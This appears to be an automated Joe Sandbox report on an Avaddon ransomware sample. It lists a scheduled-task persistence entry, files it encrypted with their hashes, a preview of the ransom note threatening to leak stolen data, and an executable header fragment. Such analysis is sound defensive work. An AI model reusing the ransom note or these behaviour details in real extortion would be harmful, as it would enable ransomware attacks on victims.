Start date:	06.01.2022
Start time:	16:46:45
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ab.bin (renamed file extension from bin to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	45
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.spre.troj.evad.winEXE@27/228@0/0
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 36.1% (good quality ratio 34.5%) Quality average: 67.8% Quality standard deviation: 26.7%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, VSSVC.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.35.236.56 Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:47:35	Task Scheduler	Run new task: update path: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe
16:47:36	API Interceptor	6x Sleep call for process: WMIC.exe modified
16:47:46	API Interceptor	1x Sleep call for process: ab.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\$RECYCLE.BIN\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	Windows desktop.ini, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	129
Entropy (8bit):	5.323600488446077
Encrypted:	false
SSDEEP:	3:0NdQDjoqxyRVIQBU+1IVLfAPmBACaWZcy/FbBmedyn:0NwoSyzI2U8MAPVCawbBmeUn
MD5:	A526B9E7C716B3489D8CC062FBCE4005
SHA1:	2DF502A944FF721241BE20A9E449D2ACD07E0312
SHA-256:	E1B9CE9B57957B1A0607A72A057D6B7A9B34EA60F3F8AA8F38A3AF979BD23066
SHA-512:	D83D4C656C96C3D1809AD06CE78FA09A77781461C99109E4B81D1A186FC533A7E72D65A4CB7EDF689EECCDA8F687A13D3276F1111A1E72F7C3CD92A49BCE0F88
Malicious:	false
Preview:	[.ShellClassInfo]..CLSID={645FF040-5081-101B-9F08-00AA002F954E}..LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-8964..

C:\$RECYCLE.BIN\desktop.ini Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	Windows desktop.ini, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	129
Entropy (8bit):	5.323600488446077
Encrypted:	false
SSDEEP:	3:0NdQDjoqxyRVIQBU+1IVLfAPmBACaWZcy/FbBmedyn:0NwoSyzI2U8MAPVCawbBmeUn
MD5:	A526B9E7C716B3489D8CC062FBCE4005
SHA1:	2DF502A944FF721241BE20A9E449D2ACD07E0312
SHA-256:	E1B9CE9B57957B1A0607A72A057D6B7A9B34EA60F3F8AA8F38A3AF979BD23066
SHA-512:	D83D4C656C96C3D1809AD06CE78FA09A77781461C99109E4B81D1A186FC533A7E72D65A4CB7EDF689EECCDA8F687A13D3276F1111A1E72F7C3CD92A49BCE0F88
Malicious:	false
Preview:	[.ShellClassInfo]..CLSID={645FF040-5081-101B-9F08-00AA002F954E}..LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-8964..

C:\Users\Public\Libraries\RecordedTV.library-ms Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.97920677738626
Encrypted:	false
SSDEEP:	192:AmnF2WNC7nuVmW/CKw3GwU+GpV0nD2t6SOtpVD4sNK763dV+P:321W/nwWwU+GpeD20rissGO
MD5:	E22DCB2757FF27EEF3268FB5726335A2
SHA1:	CAC1831D5DDC0D5FCB743AC5570FB501DCB1A49A
SHA-256:	299386AACAF3CDA22C4DF4647593E644DBB668BCC2DA4B4D3B41BB98E43AF428
SHA-512:	1D99E98BF756EF952695C5552ABDB06B74720825DAFF8ECBF0D72311B4303F6E8013C8515BB3EDAB698D0D6271AE2A5D06B6CE0FF0DECC5FD438366B374ECAB8
Malicious:	false
Preview:	.]..f.).....K...u[[G.ZX.!.\|K.b.B.B.Pv...#.l..EgK5.....a..I....BN..TP...E]..g.fr...W...._.2#F...l.@.f}qf..@N....."....&n.p...tb/..y.<.......?O.....o..dh,%...>...$Jy...a.......]--..#&........W.b....\..a......@W -K.5,.....j.....~.T....<..N..J..~..M...+...GP.'+.L..:3...w........{.{.l..$d..5..-.-.M)3CD.....e.H....../..<...#._V....Mgn..U..7.u...~...o0......!<....A#.t~.fJ\|.:.5.k...f=..W..t...........]...S.W.....V.."..M..9.w......O....6..7p..7.Sj.l^i.{....H...P5..,..&m...H..G;z1i....N..+..b.....u..X.h..fU...@.j.ix..>T.I....G..s....i.......f&yH..5....!.,K/.'%^.\|.[.......:E......E..8.".u.@c.......[.@U.d....hK..@4..(....O..f..@^.S.G..e.]..F.Y..Qo..W...U.l..C...<76.vzyJ? ..,.I,}....p+j,......s....V.xn.e../.x...HP.7v...W;.>....n.M.L..G3L."J...N.w.f....a.o......W..".?.h.Mt.v....l..p..K....1..#.I........k....r.....W....5...=63e<.........E.\...^=....y..z......E45.\T...'.]...W8..m#<..4..,_.I..^I.S..tn....@F..%!/NT.{..:.../p.-n,.5.\|...W..

C:\Users\Public\Libraries\RecordedTV.library-ms.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.97920677738626
Encrypted:	false
SSDEEP:	192:AmnF2WNC7nuVmW/CKw3GwU+GpV0nD2t6SOtpVD4sNK763dV+P:321W/nwWwU+GpeD20rissGO
MD5:	E22DCB2757FF27EEF3268FB5726335A2
SHA1:	CAC1831D5DDC0D5FCB743AC5570FB501DCB1A49A
SHA-256:	299386AACAF3CDA22C4DF4647593E644DBB668BCC2DA4B4D3B41BB98E43AF428
SHA-512:	1D99E98BF756EF952695C5552ABDB06B74720825DAFF8ECBF0D72311B4303F6E8013C8515BB3EDAB698D0D6271AE2A5D06B6CE0FF0DECC5FD438366B374ECAB8
Malicious:	false
Preview:	.]..f.).....K...u[[G.ZX.!.\|K.b.B.B.Pv...#.l..EgK5.....a..I....BN..TP...E]..g.fr...W...._.2#F...l.@.f}qf..@N....."....&n.p...tb/..y.<.......?O.....o..dh,%...>...$Jy...a.......]--..#&........W.b....\..a......@W -K.5,.....j.....~.T....<..N..J..~..M...+...GP.'+.L..:3...w........{.{.l..$d..5..-.-.M)3CD.....e.H....../..<...#._V....Mgn..U..7.u...~...o0......!<....A#.t~.fJ\|.:.5.k...f=..W..t...........]...S.W.....V.."..M..9.w......O....6..7p..7.Sj.l^i.{....H...P5..,..&m...H..G;z1i....N..+..b.....u..X.h..fU...@.j.ix..>T.I....G..s....i.......f&yH..5....!.,K/.'%^.\|.[.......:E......E..8.".u.@c.......[.@U.d....hK..@4..(....O..f..@^.S.G..e.]..F.Y..Qo..W...U.l..C...<76.vzyJ? ..,.I,}....p+j,......s....V.xn.e../.x...HP.7v...W;.>....n.M.L..G3L."J...N.w.f....a.o......W..".?.h.Mt.v....l..p..K....1..#.I........k....r.....W....5...=63e<.........E.\...^=....y..z......E45.\T...'.]...W8..m#<..4..,_.I..^I.S..tn....@F..%!/NT.{..:.../p.-n,.5.\|...W..

C:\Users\Public\Libraries\uCLrcwQ_readme_.txt Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	ASCII text, with very long lines, with CRLF, CR, LF line terminators
Category:	modified
Size (bytes):	3777
Entropy (8bit):	5.732654072634773
Encrypted:	false
SSDEEP:	48:L9k0ZzV7L/vNbXGZULVDgUp4qNiiE6bm1c0rfWejhAe/YAliM3PXnLHrYxgkH69J:L95zhLNbXGZUe7Ka6pU6i9fLrvE69USd
MD5:	7C4A65CA4999BD0122440C05C4D40942
SHA1:	8494FA2322AF44C66F598179B42D08105374AD6F
SHA-256:	86DFF7E4B80C8A48CC63CB4A0DFC3B92C64355E9B441B3D3C05EE319A25FBFF0
SHA-512:	A61FA1744DB62E97A448ADF564A162D61CD10DE6BC03734369BDA58D32AAB67B81F18667B5E5842DF57672E009385AE03ED5868354732F61CDD0B3B27C606968
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, Author: Joe Security Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, Author: Joe Security
Preview:	-------=== Your network has been infected! ===-------.........*************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------

C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	794112
Entropy (8bit):	6.16411908069709
Encrypted:	false
SSDEEP:	24576:TCs99+OXLpMePfI8TgmBTCDqEbOpPtpFhyxfq:5GOXLpMePfzVTCD7gPtLhSfq
MD5:	0B486FE0503524CFE4726A4022FA6A68
SHA1:	297DEA71D489768CE45D23B0F8A45424B469AB00
SHA-256:	1228D0F04F0BA82569FC1C0609F9FD6C377A91B9EA44C1E7F9F84B2B90552DA2
SHA-512:	F4273CA5CC3A9360AF67F4B4EE0BF067CF218C5DC8CAEAFBFA1B809715EFFE742F2E1F54E4FE9EC8D4B8E3AE697D57F91C2B49BDF203648508D75D4A76F53619
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 88%, Browse Antivirus: Metadefender, Detection: 66%, Browse Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9.I.}.'}}.'}}.'}i.$\|l.'}i."\|.'}i.#\|j.'}i.!\|..'}..#\|l.'}..$\|k.'}.."\|.'}i.&\|j.'}}.&}..'}...\|l.'}...}\|.'}}..}\|.'}..%\|\|.'}Rich}.'}................PE..L...G.h`....................................@....@..........................`............@.................................. ..................................D...,n..8...........................hn..@............@..X............................text...L(......................... ..`.rdata.......@......................@..@.data....x...@...h..."..............@....rsrc...............................@..@.reloc..D...........................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Desktop\BNAGMGSPLO.jpg Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978845042070389
Encrypted:	false
SSDEEP:	192:Cw8bRbuj/mAcfzOaMdsonbziYvSHsj/4a57yV+n:CZlVAcfzOxNnbT6etr
MD5:	C1DD5D9DDD42B96F8CB33309E8E5E313
SHA1:	DA232AE8830066BFE4689BFC22641E5E966DCA38
SHA-256:	35E5F4EE17A317C29EA205854051061007F8CB7B1C1480F8F45F11AA8FB3CC4D
SHA-512:	61DD30A3F328A8D8DFFCF0908F9E91AF224CD1FD485C69D5809EFD4D00DDCEC2933B32C4FEB946BDFE5E0F0CD82A7FBA9E6DBFEDEFA9C0B1D43C27342118279B
Malicious:	true
Preview:	6.u...tXP+(.\..;@8.q`.c....OE...A.....}.C.'PQ..`VX./.fdSO.a.b.b!..4..By......./..]kX..;........o....^..6..[.9. d............~.l.I..w$T.........1......$$....A.u.D..O.^b.vi...a.;Lp:..PV2......V...`...#WC.....s.k..?...~....n.....'.P`.".o..r....S..K.....Y..k32".rH...2G.w...:$...l%-.$F..t.fEy...........j.a.....)uR..........HRAn.....z.@..i....i.....g8@.....} ...+p..(.....!\..[.{#<nuP.y.....,.d..l6d../l%8...X.h.....f(I<.@.ca...+.6../."`....4-y.n.`..PY`..+o:yZA0{..L.`.n.pS..g.!#h1.pP.X..i.i...........%...6h.P:.88.AHrJ~...x.E..kp=B.........}..{.m.W.........9P~....P..o..h..#........x.1.8....4.V#^..0....}.s..;...i...d...%..SWy.Vc.\....3...B.V.K....J.....{1Q...G6$..^.~iOh...5:...@.)..N.eN.:e.k.A..8O........G..a....=...A...bC.e...gq\...9.ok(..v.().>.^A....yn.n..q..y....~..m......25ZKX./X\P.!.B8.......0j.;..FY.]L.k.xt.?.arI.r...m=....\|Ly.n.~&....tt..8.:V.5"......y.>.....QKd...x..k..k...s.<.}x..d....}F..%.m.......v...Z.._......8..}A.e..%./...L.n...}....9.

C:\Users\user\Desktop\BNAGMGSPLO.jpg.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978845042070389
Encrypted:	false
SSDEEP:	192:Cw8bRbuj/mAcfzOaMdsonbziYvSHsj/4a57yV+n:CZlVAcfzOxNnbT6etr
MD5:	C1DD5D9DDD42B96F8CB33309E8E5E313
SHA1:	DA232AE8830066BFE4689BFC22641E5E966DCA38
SHA-256:	35E5F4EE17A317C29EA205854051061007F8CB7B1C1480F8F45F11AA8FB3CC4D
SHA-512:	61DD30A3F328A8D8DFFCF0908F9E91AF224CD1FD485C69D5809EFD4D00DDCEC2933B32C4FEB946BDFE5E0F0CD82A7FBA9E6DBFEDEFA9C0B1D43C27342118279B
Malicious:	false
Preview:	6.u...tXP+(.\..;@8.q`.c....OE...A.....}.C.'PQ..`VX./.fdSO.a.b.b!..4..By......./..]kX..;........o....^..6..[.9. d............~.l.I..w$T.........1......$$....A.u.D..O.^b.vi...a.;Lp:..PV2......V...`...#WC.....s.k..?...~....n.....'.P`.".o..r....S..K.....Y..k32".rH...2G.w...:$...l%-.$F..t.fEy...........j.a.....)uR..........HRAn.....z.@..i....i.....g8@.....} ...+p..(.....!\..[.{#<nuP.y.....,.d..l6d../l%8...X.h.....f(I<.@.ca...+.6../."`....4-y.n.`..PY`..+o:yZA0{..L.`.n.pS..g.!#h1.pP.X..i.i...........%...6h.P:.88.AHrJ~...x.E..kp=B.........}..{.m.W.........9P~....P..o..h..#........x.1.8....4.V#^..0....}.s..;...i...d...%..SWy.Vc.\....3...B.V.K....J.....{1Q...G6$..^.~iOh...5:...@.)..N.eN.:e.k.A..8O........G..a....=...A...bC.e...gq\...9.ok(..v.().>.^A....yn.n..q..y....~..m......25ZKX./X\P.!.B8.......0j.;..FY.]L.k.xt.?.arI.r...m=....\|Ly.n.~&....tt..8.:V.5"......y.>.....QKd...x..k..k...s.<.}x..d....}F..%.m.......v...Z.._......8..}A.e..%./...L.n...}....9.

C:\Users\user\Desktop\EEGWXUHVUG.png Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978111793832275
Encrypted:	false
SSDEEP:	192:OkGcTe/5yk671S6mqkBeSv4SXq407EzQyXvkwrGV+n:51Bk6RS6nQXxHEEz5
MD5:	E4C6DDAC88526D3CC6861A9E4279477B
SHA1:	4C9F8F0987306CB664E26B9FAACDA969451C0CFE
SHA-256:	B572F5CDFCFC14CDFCD5938B1E63E599CC0C7C2DAAF22A48AC7BA03969802B2C
SHA-512:	EC68AB52A5A3BB66CB59895ACFD7ACB2B8B084F4C410DD4D48E9306F6162CADA7F8857F1567FC84AB899ECA10F2F4B9C1D1651DA3B3F6ABE09BFD67C3D8EACFA
Malicious:	false
Preview:	F...6.4.ka{.T.Mx].......%.34...'+..f........L.D.D.#.V.q..%.....f.\|rF.p....4O.../...:..P2.0.@{Y.....p.n..2..>.G..L$......w.)g.'..6V.}1A<..Q......}..~@.....j. ].....)...d.e......D.._+..K.$...qS..<]d.:....E.y.D.........s........"....;}..]}D.p@..$..jl.N.;.D\`....)7.....j...Nr...{...M...W...3.....l[z....NU.p..y.P..U.?VQ......k+...T...z.n....g..m)...K>)..h.&4..<j.$1~.U.....8f.R....Zg..S...S.Le..{..85.....n@.7..mrh&.G......m .}.x.......R.-..y.Eh/.....w...3.....f.....n..M.!.....v...c.2..Q.Fp......8..1....V.m..........].+7..X.c..B.......!P....j...I..wu'.R.:........Z.6c.#^IS...../..P.2#...d..^H.U.WJ"..o.,.<..?...fn"$C.]..kC.b.d.r.fp../..L....v&,;h...Z..h%...2.......s....].T.-.'...(#+4L.s..2....e$.......y.B.i.L._j&...b...._....c.h{.....p....7.C....,tW ....Q.R....>W....ss..]w..:,.G.....~z.\.Z..DswP....'[&.uF2%2u..x.*!.%....MXY.dS.K...s.............)L~...._.....b..U1a.P..g7.H\".Am6........_.^....dB..'....].Z.R6=..v{....I..q.?..?...ywX.B>8...g....n;.....%Y.

C:\Users\user\Desktop\EEGWXUHVUG.png.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.978111793832275
Encrypted:	false
SSDEEP:	192:OkGcTe/5yk671S6mqkBeSv4SXq407EzQyXvkwrGV+n:51Bk6RS6nQXxHEEz5
MD5:	E4C6DDAC88526D3CC6861A9E4279477B
SHA1:	4C9F8F0987306CB664E26B9FAACDA969451C0CFE
SHA-256:	B572F5CDFCFC14CDFCD5938B1E63E599CC0C7C2DAAF22A48AC7BA03969802B2C
SHA-512:	EC68AB52A5A3BB66CB59895ACFD7ACB2B8B084F4C410DD4D48E9306F6162CADA7F8857F1567FC84AB899ECA10F2F4B9C1D1651DA3B3F6ABE09BFD67C3D8EACFA
Malicious:	false
Preview:	F...6.4.ka{.T.Mx].......%.34...'+..f........L.D.D.#.V.q..%.....f.\|rF.p....4O.../...:..P2.0.@{Y.....p.n..2..>.G..L$......w.)g.'..6V.}1A<..Q......}..~@.....j. ].....)...d.e......D.._+..K.$...qS..<]d.:....E.y.D.........s........"....;}..]}D.p@..$..jl.N.;.D\`....)7.....j...Nr...{...M...W...3.....l[z....NU.p..y.P..U.?VQ......k+...T...z.n....g..m)...K>)..h.&4..<j.$1~.U.....8f.R....Zg..S...S.Le..{..85.....n@.7..mrh&.G......m .}.x.......R.-..y.Eh/.....w...3.....f.....n..M.!.....v...c.2..Q.Fp......8..1....V.m..........].+7..X.c..B.......!P....j...I..wu'.R.:........Z.6c.#^IS...../..P.2#...d..^H.U.WJ"..o.,.<..?...fn"$C.]..kC.b.d.r.fp../..L....v&,;h...Z..h%...2.......s....].T.-.'...(#+4L.s..2....e$.......y.B.i.L._j&...b...._....c.h{.....p....7.C....,tW ....Q.R....>W....ss..]w..:,.G.....~z.\.Z..DswP....'[&.uF2%2u..x.*!.%....MXY.dS.K...s.............)L~...._.....b..U1a.P..g7.H\".Am6........_.^....dB..'....].Z.R6=..v{....I..q.?..?...ywX.B>8...g....n;.....%Y.

C:\Users\user\Desktop\EFOYFBOLXA.jpg Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9783433145335865
Encrypted:	false
SSDEEP:	192:jCtyPOg9Ta7xm/sJ1duqSNYHTF1DCn03s3nc6JV+n:Ot+qxm/q1dO+zqn8Oc6W
MD5:	264BDCF39559FE6FDB92CFF7582810F1
SHA1:	E21157DCF3F6233446D5A7AC465C52B64704DAB0
SHA-256:	7A6F1A1E0FA03F69A2CA49411ABFFD270C1EED058355F08F1A0AF3B09313C275
SHA-512:	A87784AF608B94445AB2C7D1B4EED2E16F9AF25FAEE50561A3A2A4F059565CFE0FD79538C590CD67212874055458E2DA9858BA8C1D5A5430A82C264ACEC596E9
Malicious:	false
Preview:	t.c{Yw..+.JN...5[.i9..b..".[D..7...S.............tI'.$..M..R.7...i.."~...@.n...m..A ?\|....E]...*J..ahb8B....m.u..........xQ.l.).a@.....v..rR.M0........%..>..pKI._.-.c..%.2.[z?Z~.J.T.X.....\|E .@...N ..ckIb\..{..c..b.u".........l.....{......E;.MD.....+{.....E!k..D.B4.}".}.....+m.;.Q7....]%.Q...Z3...\|..../.....F..l...M......e........2.>Kc.$:u.R..;+.....pNT...W.H#.Zk.SX.CF.~...t.P.l.n\|......./...{.Yco.`y$6.GsSv{7y..y.@...yd...(._N...m0!.Y......)......_...XWD....9..s...;.......f.yr.h.4.c!S@..'....z...<.T'........3....{.U..pTX.s.%.^.\M.m..S)Y.-..V.HW?.....P.q....v.~....190..V.}..k.sW7 .7..M.?.b.H.N.1-l.....M..6...m._.Z..H..H.Y..j..\......7.....t.#..=...<.'q...\iv..V'\|.81.K.).6........f.,........`NRIx4y4{.s... l..\/..G.r..Ql.#B.....3...W`.(..f.....2.kM........E8^..j..o....d.H,....E....Z..4$.}_-?....VZ......UA.S.x....[........{7%....}..>..2O`fs..7...+.9.9.E6..%.]..o...{.....L..`@f.....G>.;.d....%...l..c..7..P....r..T.`.......]....R.F.:.n?_D.l.V. .n.+O

C:\Users\user\Desktop\EFOYFBOLXA.jpg.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9783433145335865
Encrypted:	false
SSDEEP:	192:jCtyPOg9Ta7xm/sJ1duqSNYHTF1DCn03s3nc6JV+n:Ot+qxm/q1dO+zqn8Oc6W
MD5:	264BDCF39559FE6FDB92CFF7582810F1
SHA1:	E21157DCF3F6233446D5A7AC465C52B64704DAB0
SHA-256:	7A6F1A1E0FA03F69A2CA49411ABFFD270C1EED058355F08F1A0AF3B09313C275
SHA-512:	A87784AF608B94445AB2C7D1B4EED2E16F9AF25FAEE50561A3A2A4F059565CFE0FD79538C590CD67212874055458E2DA9858BA8C1D5A5430A82C264ACEC596E9
Malicious:	false
Preview:	t.c{Yw..+.JN...5[.i9..b..".[D..7...S.............tI'.$..M..R.7...i.."~...@.n...m..A ?\|....E]...*J..ahb8B....m.u..........xQ.l.).a@.....v..rR.M0........%..>..pKI._.-.c..%.2.[z?Z~.J.T.X.....\|E .@...N ..ckIb\..{..c..b.u".........l.....{......E;.MD.....+{.....E!k..D.B4.}".}.....+m.;.Q7....]%.Q...Z3...\|..../.....F..l...M......e........2.>Kc.$:u.R..;+.....pNT...W.H#.Zk.SX.CF.~...t.P.l.n\|......./...{.Yco.`y$6.GsSv{7y..y.@...yd...(._N...m0!.Y......)......_...XWD....9..s...;.......f.yr.h.4.c!S@..'....z...<.T'........3....{.U..pTX.s.%.^.\M.m..S)Y.-..V.HW?.....P.q....v.~....190..V.}..k.sW7 .7..M.?.b.H.N.1-l.....M..6...m._.Z..H..H.Y..j..\......7.....t.#..=...<.'q...\iv..V'\|.81.K.).6........f.,........`NRIx4y4{.s... l..\/..G.r..Ql.#B.....3...W`.(..f.....2.kM........E8^..j..o....d.H,....E....Z..4$.}_-?....VZ......UA.S.x....[........{7%....}..>..2O`fs..7...+.9.9.E6..%.]..o...{.....L..`@f.....G>.;.d....%...l..c..7..P....r..T.`.......]....R.F.:.n?_D.l.V. .n.+O

C:\Users\user\Desktop\EFOYFBOLXA.mp3 Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9745453799453605
Encrypted:	false
SSDEEP:	192:rAbd0iWYRBCS4u2uVMMLx9PBUaLx64Cqv3Chz/kYVV+n:wdfHf94upqMl9PBUQxh3v3uz/a
MD5:	EC542B434FA48D85DC67F32EB751A4E3
SHA1:	B2620AB705E48FE29352AD8EDE11933C7F9D6B5F
SHA-256:	C3D00E5448E4C971F8CA65F0514C3A579E32D9AB51CBC00217540B6F6BBC6A96
SHA-512:	13D585F8E8C3BFB3780A4127E94C61E1530E357A97111CFE237DC6057A485CCADB46378275F437D60A2F6655B5A1E8C3B4F2C9FFE027B859D0C2CDB0877F2A78
Malicious:	false
Preview:	.....+=52_....>W.H..z.:.l.;.`......^.....lU.].....HA.....4.v...\|.]..:.;.J..h.....#b....;./R.r.s..f//f}.......q....&4...@..&x..x{..1....:[]u;.{.........(a.KJ.K/.w.%.k..1]6p.w&..^O.g.).1G...I...3\|>oY.....T...m..$.."4.6t...4..T.L...W.C.8H..`.kI.o.........Bu.+...D.Rz.....!S..#.x..._.[.R.)i.mO.L`}.pk..1..)......,by...B...:.. 0g......W.... .(..Y....".L...9<......;;..m.q:..S....o.0.t.LOT..X".#K......{...p.5..V..$a.&...[^O].r.'VE1<UD..#`.d.e..U0.6......n...S....%`.....vY"..7.[....\|.m.....n.=okp?..:....>r..qU~<.H......8.W..m......._....Ai..q.}..P..5..#.C...y?.-.c.....O.(}c.^\.F...Z.......M.O=p...2.k.hUK...9.N`.Q.Q.(..m.....T.c9.\|..%w.+u`4g<..N..._...}k.C....U......Ah I.....-BM..f..kI.>...%.?!.p.q....*P...[.a5e....-.!g.Hh..l...D....r..Q...?o..Z.e..&=..R.Jd.nj.W..E.f...A.....q._vB........~.....$# ...2j. .5.{BQ...+..3l....6..;.}...5.._...H...s..eS....(._.X....'j.{.Lj.@.96k..l..G(P.1+..ww\|6......O%........FU.e..x.`r.....L.S.7.q.....Lk.N....2lkE.....Q.g#.w.

C:\Users\user\Desktop\EFOYFBOLXA.mp3.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9745453799453605
Encrypted:	false
SSDEEP:	192:rAbd0iWYRBCS4u2uVMMLx9PBUaLx64Cqv3Chz/kYVV+n:wdfHf94upqMl9PBUQxh3v3uz/a
MD5:	EC542B434FA48D85DC67F32EB751A4E3
SHA1:	B2620AB705E48FE29352AD8EDE11933C7F9D6B5F
SHA-256:	C3D00E5448E4C971F8CA65F0514C3A579E32D9AB51CBC00217540B6F6BBC6A96
SHA-512:	13D585F8E8C3BFB3780A4127E94C61E1530E357A97111CFE237DC6057A485CCADB46378275F437D60A2F6655B5A1E8C3B4F2C9FFE027B859D0C2CDB0877F2A78
Malicious:	false
